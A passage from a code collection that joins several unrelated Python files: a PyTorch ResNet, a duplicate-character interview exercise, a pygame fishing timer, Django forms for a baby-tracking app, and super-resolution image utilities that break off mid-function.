| baturaysaglam/RIS-MISO-Deep-Reinforcement-Learning | main.py | main.py | py | 6,892 | python | en | code | 77 | github-code | 50 |
29943658246 | import torch
from torch import nn
from torch.nn import functional as F
class Residual(nn.Module):
def __init__(self, input_channels, num_channels, use_1x1conv=False, padding=1, strides=1):
super().__init__()
self.conv1 = nn.Conv2d(input_channels, num_channels, kernel_size=3, stride=strides, padding=1)
self.conv2 = nn.Conv2d(num_channels, num_channels, kernel_size=3, padding=1)
if use_1x1conv:
self.conv3 = nn.Conv2d(input_channels, num_channels, kernel_size=1, stride=strides)
else:
self.conv3 = None
self.bn1 = nn.BatchNorm2d(num_channels)
self.bn2 = nn.BatchNorm2d(num_channels)
def forward(self, x):
y = F.relu(self.bn1(self.conv1(x)))
y = self.bn2(self.conv2(y))
if self.conv3:
x = self.conv3(x)
# This is the skip connection!
y += x
return F.relu(y)
def resnet_block(input_channels, num_channels, num_residuals, first_block=False):
block = []
for i in range(num_residuals):
if not i and not first_block:
block.append(Residual(input_channels, num_channels, use_1x1conv=True, strides=2))
else:
block.append(Residual(num_channels, num_channels))
return block
b1 = nn.Sequential(
nn.Conv2d(1, 64, kernel_size=7, stride=2, padding=3),
nn.BatchNorm2d(64), nn.ReLU(),
nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
)
b2 = nn.Sequential(
nn.Sequential(*resnet_block(64, 64, 2, first_block=True)),
nn.Sequential(*resnet_block(64, 128, 2)),
nn.Sequential(*resnet_block(128, 256, 2)),
nn.Sequential(*resnet_block(256, 512, 2))
)
resnet = nn.Sequential(
b1, b2,
nn.AdaptiveAvgPool2d((1, 1)),
nn.Flatten(), nn.Linear(512, 10)
)
def shape_evolution():
x = torch.randn((1, 1, 512, 512))
for layer in resnet:
x = layer(x)
print(layer.__class__.__name__, 'output shape:\t', x.shape)
def main():
shape_evolution()
if __name__ == "__main__":
main()
| Arni14/Deep-Learning | modern_architectures/resnet.py | resnet.py | py | 2,032 | python | en | code | 0 | github-code | 50 |
70782323675 | # Samuel Hulme
# Cracking the Coding Interview
# Question 1.1
#
# Implement an algorithm to determine if a string has all unique characters. What is you cannot use additional data structures?
#
# Thoughts:
# To implement this, we can use a dictionary. To do this, iterate through the list and then insert the characters into
# a dictionary. If an element already exists for that string, we know that it is has been accessed twice.
# Using a dictionary, which is a hashmap, we can almost always check for items in O(1), add in O(1). It will take O(n)
# to go through the list.
#
# contains_duplicates_dict(str)
# Go through the string and check if the character is already in the dictionary. If so, there are duplicates. If
# not, add to dict and continue. Using a dictionary, which is a hashmap, we can almost always check for items in
# O(1), add in O(1). It will take O(n) to go through the list.
#
# Pros: Quick. Runs in O(n) without lots of memory usage in the typical case.
#
# contains_duplicates_bf(str)
# This is the for the case where we cannot use additional data structures. In this case, we can brute force it and
# compare each chracter to every other. This takes O(n^2).
#
# contains_duplicates_sort(str)
# No data structures again. This time, sort the list and then go up through it. This is O(nlogn + n) = O(nlogn)
#
#
string_with_duplicates = "Hello there young lad!"
string_no_duplicates = "abcdefg"
dup_exist = "Duplicates exist"
no_dup = "No duplicates"
def contains_duplicates_dict(str): # O(n)
dict = {}
for char in str:
if char in dict:
return True
else:
dict[char] = 1
return False
def contains_duplicates_bf(str): # O(n^2)
for i in range(0, len(str)):
for j in range(i, len(str)):
if i != j and str[i] == str[j]:
return True
return False
def contains_duplicates_sort(str): #O(nlogn + n) = O(nlogn)
str_sorted = ''.join(sorted(str)) #O(n) for .join()
for i in range(1, len(str_sorted)):
if str_sorted[i] == str_sorted[i-1]:
return True
return False
def test_for_duplicates(type):
test_string = input("Enter a string: ")
duplicates_exist = False
if type == "D": # Dictionary
duplicates_exist = contains_duplicates_dict(test_string)
if type == "BF": # Brute Force
duplicates_exist = contains_duplicates_bf(test_string)
if type == "S": # Sorted
duplicates_exist = contains_duplicates_sort(test_string)
print("\nDuplicate characters DO exist" if duplicates_exist else "\nDuplicate characters do NOT exist")
#print("\nUsing a dictionary:")
#test_for_duplicates("D", string_with_duplicates)
#test_for_duplicates("D", string_no_duplicates)
#print("\nUsing a brute force approach:")
#test_for_duplicates("BF", string_with_duplicates)
#test_for_duplicates("BF", string_no_duplicates)
#print("\nSorting then iterating:")
#test_for_duplicates("S", string_with_duplicates)
#test_for_duplicates("S", string_no_duplicates)
print("\n\nThis program will take a string and determine if there are duplicate characters in the string ")
print("There are three different algorithms available to do this. Choose an algorithm from the following by entering 1, 2, or 3.")
print(" 1.) Using A Dictionary - O(n)")
print(" 2.) Using A Brute Force Approach - O(n^2)")
print(" 3.) Sorting Than Iterating - O(nlogn)")
bad_answer = True
while bad_answer:
answer = input("\nSelect an algorithm by typing 1, 2, or 3: ")
if answer == "1":
bad_answer = False
test_for_duplicates("D") #Dictionary
elif answer == "2":
bad_answer = False
test_for_duplicates("BF") #Brute Force
elif answer == "3":
bad_answer = False
test_for_duplicates("S") #Sorting
| shulme33/Programming | Python/cci_1-1.py | cci_1-1.py | py | 3,889 | python | en | code | 0 | github-code | 50 |
39210745835 | from ui_elements import Text, Picture
from config import *
import pygame
import random
class SystemFish:
def __init__(self):
self.timer = 0
self.exists = False
self.delay = None
self.opportunity = None
self.fish_counter = None
self.randomize()
self.fish_alert = Picture('img/Zap.png', 800, 450, 4)
def __call__(self, screen, left_click):
# Fish counter
self.fish_counter(screen)
# Increase timer if user is fishing.
if left_click:
self.timer += 1
else:
self.timer = 0
# If the timer passes the delay (Fish appears!)
if self.timer > self.delay:
if left_click:
self.fish_alert(screen, 255)
self.exists = True
# If the user misses the fish
if self.timer > self.delay + self.opportunity:
self.randomize()
# Catch!
if self.exists and left_click == False:
Config.data['FISH_COUNT'] += 1
self.randomize()
def randomize(self):
self.timer = 0
self.exists = False
# 5 20
self.delay = random.uniform(1.5, 6) * 60
self.opportunity = random.uniform(0.5, 1) * 60
# Update fish counter
self.fish_counter = Text(f"Fish: {str(Config.data['FISH_COUNT'])}", 200, 100, 'Blue', 'pristina', 120)
| Archkitten/CS-AP-2 | p2/flyby_fishing/system_fish.py | system_fish.py | py | 1,399 | python | en | code | 0 | github-code | 50 |
12520662785 | # -*- coding: utf-8 -*-
from django import forms
from django.conf import settings
from django.utils.encoding import force_str
from django.utils import timezone, dateparse
from django.utils.translation import gettext as _
from core import models
# Sets the default Child instance if only one exists in the database.
def set_default_child(kwargs):
instance = kwargs.get('instance', None)
if not kwargs.get('initial'):
kwargs.update(initial={})
child = kwargs.pop('child', None)
if instance is None and child is not None:
kwargs['initial'].update({'child': child})
return kwargs
# Uses a timer to set the default start and end date and updates the timer.
def set_default_duration(kwargs):
instance = kwargs.get('instance', None)
timer_id = kwargs.get('timer', None)
if not kwargs.get('initial'):
kwargs.update(initial={})
if not instance and timer_id:
instance = models.Timer.objects.get(id=timer_id)
kwargs['initial'].update({
'timer': instance,
'start': instance.start,
'end': instance.end or timezone.now()
})
try:
kwargs.pop('timer')
except KeyError:
pass
return kwargs
def user_children_queryset(user):
return models.Child.objects.filter(account__in=user.accounts.all())
def set_common_select_fields_empty_values(form):
select_fields = ['child', 'account']
for field in select_fields:
if field in form.fields:
form.fields[field].empty_label = ""
# Sets the default Feeding type to the one used in the most recent entry.
def set_default_feeding_type(kwargs):
instance = kwargs.get('instance', None)
if not kwargs.get('initial'):
kwargs.update(initial={})
if instance is None and models.Feeding.objects.count() > 0:
kwargs['initial'].update({
'type': models.Feeding.objects.latest('end').type
})
return kwargs
class ChildForm(forms.ModelForm):
class Meta:
model = models.Child
fields = [
'first_name',
'last_name',
'birth_date'
]
if settings.BABY_BUDDY['ALLOW_UPLOADS']:
fields.append('picture')
widgets = {
'birth_date': forms.DateInput(attrs={
'class': 'datetimepicker-input',
'data-target': '#datetimepicker_date',
}),
}
class ChildDeleteForm(forms.ModelForm):
confirm_name = forms.CharField(max_length=511)
class Meta:
model = models.Child
fields = []
def clean_confirm_name(self):
confirm_name = self.cleaned_data['confirm_name']
if confirm_name != str(self.instance):
raise forms.ValidationError(
_('Name does not match child name.'), code='confirm_mismatch')
return confirm_name
def save(self, commit=True):
instance = self.instance
self.instance.delete()
return instance
class BathForm(forms.ModelForm):
class Meta:
model = models.Bath
fields = ['time', 'child']
widgets = {
'time': forms.DateTimeInput(attrs={
'class': 'datetimepicker-input',
'data-target': '#datetimepicker_time',
}),
'child': forms.HiddenInput()
}
def __init__(self, *args, **kwargs):
kwargs = set_default_child(kwargs)
super(BathForm, self).__init__(*args, **kwargs)
class DiaperChangeForm(forms.ModelForm):
class Meta:
model = models.DiaperChange
fields = ['time', 'wet', 'solid', 'color', 'child']
widgets = {
'time': forms.DateTimeInput(attrs={
'class': 'datetimepicker-input',
'data-target': '#datetimepicker_time',
}),
'child': forms.HiddenInput()
}
def __init__(self, *args, **kwargs):
kwargs = set_default_child(kwargs)
super(DiaperChangeForm, self).__init__(*args, **kwargs)
class FeedingForm(forms.ModelForm):
class Meta:
model = models.Feeding
fields = ['start', 'end', 'type', 'method', 'amount', 'child']
widgets = {
'start': forms.DateTimeInput(attrs={
'class': 'datetimepicker-input',
'data-target': '#datetimepicker_start',
}),
'end': forms.DateTimeInput(attrs={
'class': 'datetimepicker-input',
'data-target': '#datetimepicker_end',
}),
'child': forms.HiddenInput()
}
def __init__(self, *args, **kwargs):
kwargs = set_default_child(kwargs)
kwargs = set_default_feeding_type(kwargs)
self.timer_id = kwargs.get('timer', None)
kwargs = set_default_duration(kwargs)
super(FeedingForm, self).__init__(*args, **kwargs)
def save(self, commit=True):
instance = super(FeedingForm, self).save(commit=False)
if self.timer_id:
timer = models.Timer.objects.get(id=self.timer_id)
timer.stop(instance.end)
if commit:
instance.save()
return instance
class NoteQuickAddForm(forms.ModelForm):
class Meta:
model = models.Note
fields = ['child', 'note']
def __init__(self, *args, **kwargs):
user = kwargs.pop('user')
super(NoteQuickAddForm, self).__init__(*args, **kwargs)
self.fields['child'].queryset = user_children_queryset(user)
class NoteForm(forms.ModelForm):
class Meta:
model = models.Note
fields = ['note', 'note']
widgets = {
'child': forms.HiddenInput()
}
def __init__(self, *args, **kwargs):
kwargs = set_default_child(kwargs)
super(NoteForm, self).__init__(*args, **kwargs)
class NotificationForm(forms.ModelForm):
class Meta:
model = models.Notification
fields = [
'title',
'body',
'frequency_hours',
'intervals',
'active',
'start',
'end',
'account',
'child',
]
widgets = {
'start': forms.DateTimeInput(attrs={
'class': 'datetimepicker-input',
'data-target': '#datetimepicker_start',
}),
'end': forms.DateTimeInput(attrs={
'class': 'datetimepicker-input',
'data-target': '#datetimepicker_end',
}),
'body': forms.Textarea(attrs={'rows': 4, 'cols': 10})
}
def __init__(self, *args, **kwargs):
accounts = kwargs.pop('accounts')
children = kwargs.pop('children')
instance = kwargs.get('instance')
super(NotificationForm, self).__init__(*args, **kwargs)
self.fields['account'].queryset = accounts
if not children:
children = models.Child.objects.filter(account__in=accounts)
self.fields['child'].queryset = children
set_common_select_fields_empty_values(self)
now = timezone.now()
if instance and instance.start < now:
has_sent_events = instance.notification_events.filter(sent=True).count() > 0
if has_sent_events:
for field in self.fields:
if field != 'active':
self.fields[field].widget.attrs['readonly'] = True
class SleepQuickAddForm(forms.ModelForm):
class Meta:
model = models.Sleep
fields = ['child', 'start', 'end']
widgets = {
'start': forms.DateTimeInput(attrs={
'class': 'datetimepicker-input',
'data-target': '#datetimepicker_start',
}),
'end': forms.DateTimeInput(attrs={
'class': 'datetimepicker-input',
'data-target': '#datetimepicker_end',
}),
}
def __init__(self, *args, **kwargs):
user = kwargs.pop('user')
self.timer_id = kwargs.get('timer', None)
kwargs = set_default_duration(kwargs)
super(SleepQuickAddForm, self).__init__(*args, **kwargs)
self.fields['child'].queryset = user_children_queryset(user)
def save(self, commit=True):
instance = super(SleepQuickAddForm, self).save(commit=False)
if self.timer_id:
timer = models.Timer.objects.get(id=self.timer_id)
timer.stop(instance.end)
instance.save()
return instance
class SleepForm(forms.ModelForm):
class Meta:
model = models.Sleep
fields = ['start', 'end', 'child']
widgets = {
'start': forms.DateTimeInput(attrs={
'class': 'datetimepicker-input',
'data-target': '#datetimepicker_start',
}),
'end': forms.DateTimeInput(attrs={
'class': 'datetimepicker-input',
'data-target': '#datetimepicker_end',
}),
'child': forms.HiddenInput()
}
def __init__(self, *args, **kwargs):
kwargs = set_default_child(kwargs)
self.timer_id = kwargs.get('timer', None)
kwargs = set_default_duration(kwargs)
super(SleepForm, self).__init__(*args, **kwargs)
def save(self, commit=True):
instance = super(SleepForm, self).save(commit=False)
if self.timer_id:
timer = models.Timer.objects.get(id=self.timer_id)
timer.stop(instance.end)
instance.save()
return instance
class TemperatureQuickAddForm(forms.ModelForm):
class Meta:
model = models.Temperature
fields = ['child', 'temperature', 'time']
widgets = {
'time': forms.DateTimeInput(attrs={
'class': 'datetimepicker-input',
'data-target': '#datetimepicker_time',
}),
}
def __init__(self, *args, **kwargs):
user = kwargs.pop('user')
super(TemperatureQuickAddForm, self).__init__(*args, **kwargs)
self.fields['child'].queryset = user_children_queryset(user)
class TemperatureForm(forms.ModelForm):
class Meta:
model = models.Temperature
fields = ['temperature', 'time', 'child']
widgets = {
'time': forms.DateTimeInput(attrs={
'class': 'datetimepicker-input',
'data-target': '#datetimepicker_time',
}),
'child': forms.HiddenInput()
}
def __init__(self, *args, **kwargs):
kwargs = set_default_child(kwargs)
super(TemperatureForm, self).__init__(*args, **kwargs)
class TimerQuickAddForm(forms.ModelForm):
class Meta:
model = models.Timer
fields = ['user', 'account', 'child', 'is_feeding', 'is_sleeping', 'is_tummytime', 'name', 'start']
widgets = {
'start': forms.DateTimeInput(attrs={
'class': 'datetimepicker-input',
'data-target': '#datetimepicker_start',
})
}
def __init__(self, *args, **kwargs):
user = kwargs.pop('user')
super(TimerQuickAddForm, self).__init__(*args, **kwargs)
self.fields['child'].queryset = user_children_queryset(user)
self.fields['account'].queryset = user.accounts.all()
def save(self, commit=True):
instance = super(TimerQuickAddForm, self).save(commit=False)
instance.user = self.user
instance.save()
return instance
class TimerForm(forms.ModelForm):
class Meta:
model = models.Timer
fields = ['name', 'start']
widgets = {
'start': forms.DateTimeInput(attrs={
'class': 'datetimepicker-input',
'data-target': '#datetimepicker_start',
})
}
def __init__(self, *args, **kwargs):
super(TimerForm, self).__init__(*args, **kwargs)
def save(self, commit=True):
instance = super(TimerForm, self).save(commit=False)
instance.user = self.user
instance.save()
return instance
class TummyTimeQuickAddForm(forms.ModelForm):
class Meta:
model = models.TummyTime
fields = ['child', 'start', 'end', 'milestone']
widgets = {
'start': forms.DateTimeInput(attrs={
'class': 'datetimepicker-input',
'data-target': '#datetimepicker_start',
}),
'end': forms.DateTimeInput(attrs={
'class': 'datetimepicker-input',
'data-target': '#datetimepicker_end',
}),
}
def __init__(self, *args, **kwargs):
user = kwargs.pop('user')
self.timer_id = kwargs.get('timer', None)
kwargs = set_default_duration(kwargs)
super(TummyTimeQuickAddForm, self).__init__(*args, **kwargs)
self.fields['child'].queryset = user_children_queryset(user)
def save(self, commit=True):
instance = super(TummyTimeQuickAddForm, self).save(commit=False)
if self.timer_id:
timer = models.Timer.objects.get(id=self.timer_id)
timer.stop(instance.end)
instance.save()
return instance
class TummyTimeForm(forms.ModelForm):
class Meta:
model = models.TummyTime
fields = ['start', 'end', 'milestone', 'child']
widgets = {
'start': forms.DateTimeInput(attrs={
'class': 'datetimepicker-input',
'data-target': '#datetimepicker_start',
}),
'end': forms.DateTimeInput(attrs={
'class': 'datetimepicker-input',
'data-target': '#datetimepicker_end',
}),
'child': forms.HiddenInput()
}
def __init__(self, *args, **kwargs):
kwargs = set_default_child(kwargs)
self.timer_id = kwargs.get('timer', None)
kwargs = set_default_duration(kwargs)
super(TummyTimeForm, self).__init__(*args, **kwargs)
def save(self, commit=True):
instance = super(TummyTimeForm, self).save(commit=False)
if self.timer_id:
timer = models.Timer.objects.get(id=self.timer_id)
timer.stop(instance.end)
instance.save()
return instance
class WeightQuickAddForm(forms.ModelForm):
class Meta:
model = models.Weight
fields = ['child', 'weight', 'date']
widgets = {
'date': forms.DateInput(attrs={
'class': 'datetimepicker-input',
'data-target': '#datetimepicker_date',
}),
}
def __init__(self, *args, **kwargs):
user = kwargs.pop('user')
super(WeightQuickAddForm, self).__init__(*args, **kwargs)
self.fields['child'].queryset = user_children_queryset(user)
class WeightForm(forms.ModelForm):
class Meta:
model = models.Weight
fields = ['weight', 'date', 'child']
widgets = {
'date': forms.DateInput(attrs={
'class': 'datetimepicker-input',
'data-target': '#datetimepicker_date',
}),
'child': forms.HiddenInput()
}
def __init__(self, *args, **kwargs):
kwargs = set_default_child(kwargs)
super(WeightForm, self).__init__(*args, **kwargs)
| amcquistan/babyasst | core/forms.py | forms.py | py | 15,304 | python | en | code | 0 | github-code | 50 |
23078030353 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
'''
@文件 :CommonUtils.py
@说明 :
@时间 :2021/05/29 15:47:14
@作者 :Oasis
@版本 :1.0
'''
import os
import time
import sys
import h5py
import numpy as np
import skimage.io as io
import torch
import torch.nn as nn
import math
import torch.nn.functional as F
import torch.distributed as dist
import shutil
from pytorch_msssim import ssim, ms_ssim, SSIM, MS_SSIM
from torch.utils.data import DataLoader
from Utils.buildDataset import DIV2KCropTrainDataset, DIV2KCropValidDataset
from torch.utils.data.distributed import DistributedSampler
from imageUtils.ImageUtils import *
from models.maskunit import MaskUnit
from torch.optim.lr_scheduler import _LRScheduler
from torch.optim.lr_scheduler import ReduceLROnPlateau
def collapse_Skip(weight_tmp,new_bias,f3,f3b):
weight3 = f3
bias3 = f3b
# weight merge
weight_tmp_ = weight_tmp.view(weight_tmp.size(0), weight_tmp.size(1), weight_tmp.size(2) * weight_tmp.size(3))
weight3_ = weight3.view(weight3.size(0), weight3.size(1) * weight3.size(2) * weight3.size(3))
new_weight_ = torch.Tensor(weight3.size(0), weight_tmp.size(1), weight_tmp.size(2)*weight_tmp.size(3)).to('cuda')
for i in range(weight_tmp.size(1)):
tmp = weight_tmp_[:, i, :].view(weight_tmp.size(0), weight_tmp.size(2) * weight_tmp.size(3))
new_weight_[:, i, :] = torch.matmul(weight3_, tmp)
weight_combi = new_weight_.view(weight3.size(0), weight_tmp.size(1), weight_tmp.size(2), weight_tmp.size(3))
if new_bias is not None and bias3 is not None:
new_bias = torch.matmul(weight3_, new_bias) + bias3 # with bias
elif new_bias is None:
new_bias = bias3 #without Bias
else:
new_bias = None
bia1_combi = new_bias
weight_collapse = weight_combi
return weight_collapse, bia1_combi
# matlab 'imresize' function, now only support 'bicubic'
def cubic(x):
absx = torch.abs(x)
absx2 = absx**2
absx3 = absx**3
return (1.5*absx3 - 2.5*absx2 + 1) * ((absx <= 1).type_as(absx)) + \
(-0.5*absx3 + 2.5*absx2 - 4*absx + 2) * (((absx > 1)*(absx <= 2)).type_as(absx))
def calculate_weights_indices(in_length, out_length, scale, kernel, kernel_width, antialiasing):
if (scale < 1) and (antialiasing):
# Use a modified kernel to simultaneously interpolate and antialias- larger kernel width
kernel_width = kernel_width / scale
# Output-space coordinates
x = torch.linspace(1, out_length, out_length)
# Input-space coordinates. Calculate the inverse mapping such that 0.5
# in output space maps to 0.5 in input space, and 0.5+scale in output
# space maps to 1.5 in input space.
u = x / scale + 0.5 * (1 - 1 / scale)
# What is the left-most pixel that can be involved in the computation?
left = torch.floor(u - kernel_width / 2)
# What is the maximum number of pixels that can be involved in the
# computation? Note: it's OK to use an extra pixel here; if the
# corresponding weights are all zero, it will be eliminated at the end
# of this function.
P = math.ceil(kernel_width) + 2
# The indices of the input pixels involved in computing the k-th output
# pixel are in row k of the indices matrix.
indices = left.view(out_length, 1).expand(out_length, P) + torch.linspace(0, P - 1, P).view(
1, P).expand(out_length, P)
# The weights used to compute the k-th output pixel are in row k of the
# weights matrix.
distance_to_center = u.view(out_length, 1).expand(out_length, P) - indices
# apply cubic kernel
if (scale < 1) and (antialiasing):
weights = scale * cubic(distance_to_center * scale)
else:
weights = cubic(distance_to_center)
# Normalize the weights matrix so that each row sums to 1.
weights_sum = torch.sum(weights, 1).view(out_length, 1)
weights = weights / weights_sum.expand(out_length, P)
# If a column in weights is all zero, get rid of it. only consider the first and last column.
weights_zero_tmp = torch.sum((weights == 0), 0)
if not math.isclose(weights_zero_tmp[0], 0, rel_tol=1e-6):
indices = indices.narrow(1, 1, P - 2)
weights = weights.narrow(1, 1, P - 2)
if not math.isclose(weights_zero_tmp[-1], 0, rel_tol=1e-6):
indices = indices.narrow(1, 0, P - 2)
weights = weights.narrow(1, 0, P - 2)
weights = weights.contiguous()
indices = indices.contiguous()
sym_len_s = -indices.min() + 1
sym_len_e = indices.max() - in_length
indices = indices + sym_len_s - 1
return weights, indices, int(sym_len_s), int(sym_len_e)
# --------------------------------------------
# imresize for numpy image [0, 1]
# --------------------------------------------
def imresize_np(img, scale, antialiasing=True):
# Now the scale should be the same for H and W
# input: img: Numpy, HWC or HW [0,1]
# output: HWC or HW [0,1] w/o round
img = torch.from_numpy(img)
need_squeeze = True if img.dim() == 2 else False
if need_squeeze:
img.unsqueeze_(2)
in_H, in_W, in_C = img.size()
out_C, out_H, out_W = in_C, math.ceil(in_H * scale), math.ceil(in_W * scale)
kernel_width = 4
kernel = 'cubic'
# Return the desired dimension order for performing the resize. The
# strategy is to perform the resize first along the dimension with the
# smallest scale factor.
# Now we do not support this.
# get weights and indices
weights_H, indices_H, sym_len_Hs, sym_len_He = calculate_weights_indices(
in_H, out_H, scale, kernel, kernel_width, antialiasing)
weights_W, indices_W, sym_len_Ws, sym_len_We = calculate_weights_indices(
in_W, out_W, scale, kernel, kernel_width, antialiasing)
# process H dimension
# symmetric copying
img_aug = torch.FloatTensor(in_H + sym_len_Hs + sym_len_He, in_W, in_C)
img_aug.narrow(0, sym_len_Hs, in_H).copy_(img)
sym_patch = img[:sym_len_Hs, :, :]
inv_idx = torch.arange(sym_patch.size(0) - 1, -1, -1).long()
sym_patch_inv = sym_patch.index_select(0, inv_idx)
img_aug.narrow(0, 0, sym_len_Hs).copy_(sym_patch_inv)
sym_patch = img[-sym_len_He:, :, :]
inv_idx = torch.arange(sym_patch.size(0) - 1, -1, -1).long()
sym_patch_inv = sym_patch.index_select(0, inv_idx)
img_aug.narrow(0, sym_len_Hs + in_H, sym_len_He).copy_(sym_patch_inv)
out_1 = torch.FloatTensor(out_H, in_W, in_C)
kernel_width = weights_H.size(1)
for i in range(out_H):
idx = int(indices_H[i][0])
for j in range(out_C):
out_1[i, :, j] = img_aug[idx:idx + kernel_width, :, j].transpose(0, 1).mv(weights_H[i])
# process W dimension
# symmetric copying
out_1_aug = torch.FloatTensor(out_H, in_W + sym_len_Ws + sym_len_We, in_C)
out_1_aug.narrow(1, sym_len_Ws, in_W).copy_(out_1)
sym_patch = out_1[:, :sym_len_Ws, :]
inv_idx = torch.arange(sym_patch.size(1) - 1, -1, -1).long()
sym_patch_inv = sym_patch.index_select(1, inv_idx)
out_1_aug.narrow(1, 0, sym_len_Ws).copy_(sym_patch_inv)
sym_patch = out_1[:, -sym_len_We:, :]
inv_idx = torch.arange(sym_patch.size(1) - 1, -1, -1).long()
sym_patch_inv = sym_patch.index_select(1, inv_idx)
out_1_aug.narrow(1, sym_len_Ws + in_W, sym_len_We).copy_(sym_patch_inv)
out_2 = torch.FloatTensor(out_H, out_W, in_C)
kernel_width = weights_W.size(1)
for i in range(out_W):
idx = int(indices_W[i][0])
for j in range(out_C):
out_2[:, i, j] = out_1_aug[:, idx:idx + kernel_width, j].mv(weights_W[i])
if need_squeeze:
out_2.squeeze_()
return out_2.numpy()
def compute_ck(s_1, s_2):
"""
Compute weight from 2 conv layers, whose kernel size larger than 3*3
After derivation, F.conv_transpose2d can be used to compute weight of original conv layer
:param s_1: 3*3 or larger conv layer
:param s_2: 3*3 or larger conv layer
:return: new weight and bias
"""
if isinstance(s_1, nn.Conv2d):
w_s_1 = s_1.weight # output# * input# * kernel * kernel
b_s_1 = s_1.bias
else:
w_s_1 = s_1['weight']
b_s_1 = s_1['bias']
if isinstance(s_2, nn.Conv2d):
w_s_2 = s_2.weight
b_s_2 = s_2.bias
else:
w_s_2 = s_2['weight']
b_s_2 = s_2['bias']
w_s_2_tmp = w_s_2.view(w_s_2.size(0), w_s_2.size(1), w_s_2.size(2) * w_s_2.size(3))
if b_s_1 is not None and b_s_2 is not None:
b_sum = torch.sum(w_s_2_tmp, dim=2)
new_bias = torch.matmul(b_sum, b_s_1) + b_s_2
elif b_s_1 is None:
new_bias = b_s_2 #without Bias
else:
new_bias = None
new_weight = F.conv_transpose2d(w_s_2, w_s_1)
return {'weight': new_weight, 'bias': new_bias}
def expandDataset(hr_path_base, lr_path_base, valid_hr_path, valid_lr_path, cnt, size, scale, type_ori, dataset, logger, rank, base_path, ablation=False):
if rank == 0:
logger.logger.info('make test dataset **{}**'.format(dataset))
outdir = os.path.join(base_path, 'benchmark', 'hdf5', dataset, 'X{}'.format(scale))
outpath = os.path.join(outdir, 'test_database.hdf5')
if not os.path.exists(outdir):
os.makedirs(outdir)
h5_file = h5py.File(outpath, 'w')
lr_groups = h5_file.create_group('lr')
hr_groups = h5_file.create_group('hr')
for i,img_path in enumerate(os.listdir(hr_path_base)):
if img_path.endswith(".png"):
if rank == 0:
logger.logger.info('process -> {}'.format(img_path))
hr_path = os.path.join(hr_path_base, img_path)
lr_path = os.path.join(lr_path_base, '{}x{}.png'.format(img_path.split('.')[0], scale))
hr = io.imread(hr_path)
lr = io.imread(lr_path)
hr = imgRgb2Y(hr)
lr = imgRgb2Y(lr)
lr_groups.create_dataset(str(i), data=lr)
hr_groups.create_dataset(str(i), data=hr)
h5_file.close()
def preprocess(path, build_type, args, test=False):
if build_type == 'train':
train_sampler = None
if torch.cuda.device_count() > 1 and not test:
# multi-GPUs
train_sampler = DistributedSampler(DIV2KCropTrainDataset(path), shuffle=True)
data_loader = DataLoader(DIV2KCropTrainDataset(path), batch_size=args.batch_size, shuffle=False, pin_memory=True, sampler=train_sampler, num_workers=args.num_works)
else:
# default
data_loader = DataLoader(DIV2KCropTrainDataset(path), batch_size=args.batch_size, shuffle=False, pin_memory=True, num_workers=args.num_works)
return data_loader, train_sampler
elif build_type == 'valid':
valid_sampler = None
data_loader = DataLoader(DIV2KCropValidDataset(path), batch_size=1, shuffle=False, pin_memory=True)
return data_loader, valid_sampler
else:
test_sampler = None
data_loader = DataLoader(DIV2KCropValidDataset(path), batch_size=1, shuffle=False, pin_memory=True)
return data_loader, test_sampler
def computer_psnr(pre_y, label_y, scale, data_range=1.):
pre_y = pre_y[:,:,scale:-scale, scale:-scale]
label_y = label_y[:,:,scale:-scale, scale:-scale]
b1,c1,h1,w1 = pre_y.shape
b2,c2,h2,w2 = label_y.shape
min_h = min(h1,h2)
min_w = min(w1,w2)
pre_y = pre_y[:,:,:min_h, :min_w]
label_y = label_y[:,:,:min_h, :min_w]
# mse = np.mean((pre_y - label_y)**2)
# psnr = 10 * np.log10(data_range**2/mse)
return calc_psnr(pre_y, label_y, data_range)
def calc_psnr(sr, hr, data_range):
diff = (sr - hr) / data_range
mse = diff.pow(2).mean()
psnr = -10 * torch.log10(mse)
return psnr
def calc_ssim(sr, hr, data_range):
# def ssim(
# X,
# Y,
# data_range=255,
# size_average=True,
# win_size=11,
# win_sigma=1.5,
# win=None,
# K=(0.01, 0.03),
# nonnegative_ssim=False,
# )
b1,c1,h1,w1 = sr.shape
b2,c2,h2,w2 = hr.shape
min_h = min(h1,h2)
min_w = min(w1,w2)
sr = sr[:,:,:min_h, :min_w]
hr = hr[:,:,:min_h, :min_w]
ssim_val = ssim(sr, hr, data_range, size_average=True)
return ssim_val
def clip_by_tensor(t,t_min,t_max):
"""
clip_by_tensor
:param t: tensor
:param t_min: min
:param t_max: max
:return: cliped tensor
"""
t=t.float()
t_min=t_min
t_max=t_max
result = (t >= t_min).float() * t + (t < t_min).float() * t_min
result = (result <= t_max).float() * result + (result > t_max).float() * t_max
return result
def collapse_block(layer, collapse_weight, collapse_bias, nameIn='', residual=False, mode='collapse'):
out_dict = {}
cnt = 0
for name, layer in layer.named_children():
if isinstance(layer, nn.PReLU):
collapse_weight[nameIn+'_'+'prelu'] = layer.weight.data
continue
weight1 = layer.weight.data
bias1 = layer.bias
out_dict['weight'+str(cnt)] = weight1
out_dict['bias'+str(cnt)] = bias1
cnt += 1
if mode == 'collapse':
# compute_ck()
weight1 = out_dict["weight"+str(0)]
bias1 = out_dict["bias"+str(0)]
weight2 = out_dict["weight"+str(1)]
bias2 = out_dict["bias"+str(1)]
# weight3 = out_dict["weight"+str(2)]
# bias3 = out_dict["bias"+str(2)]
weight, bias = collapse_Skip(weight1,bias1,weight2,bias2)
# weight, bias = collapse_CollapseLayer(weight1,bias1,weight2,bias2,weight3,bias3)
collapse_weight[nameIn+'_weight_comb'] = weight
collapse_bias[nameIn+'_bias_comb'] = bias
else:
weight1 = out_dict["weight"+str(0)]
bias1 = out_dict["bias"+str(0)]
weight2 = out_dict["weight"+str(1)]
bias2 = out_dict["bias"+str(1)]
# weight merge
weight_combi, bias = collapse_Skip(weight1,bias1,weight2,bias2)
if residual:
# residual merge
outDims, kernel_size = weight_combi.shape[0],weight_combi.shape[3]
weight_residual = torch.zeros(weight_combi.shape).cuda()
if kernel_size == 3:
idx = 1
if kernel_size == 5:
idx = 2
for i in range(outDims):
weight_residual[i,i,idx,idx] = 1
# residual combi
weight_collapse = weight_residual + weight_combi
else:
weight_collapse = weight_combi
collapse_weight[nameIn+'_weight_comb'] = weight_collapse
def collapse_imply(layer, collapse_weight, collapse_bias, nameIn='',skip=False):
for name, layer in layer.named_children():
if isinstance(layer, nn.Conv2d) and layer.bias is None:
layer.weight.data = collapse_weight[nameIn+'_weight_comb']
continue
elif isinstance(layer, nn.PReLU):
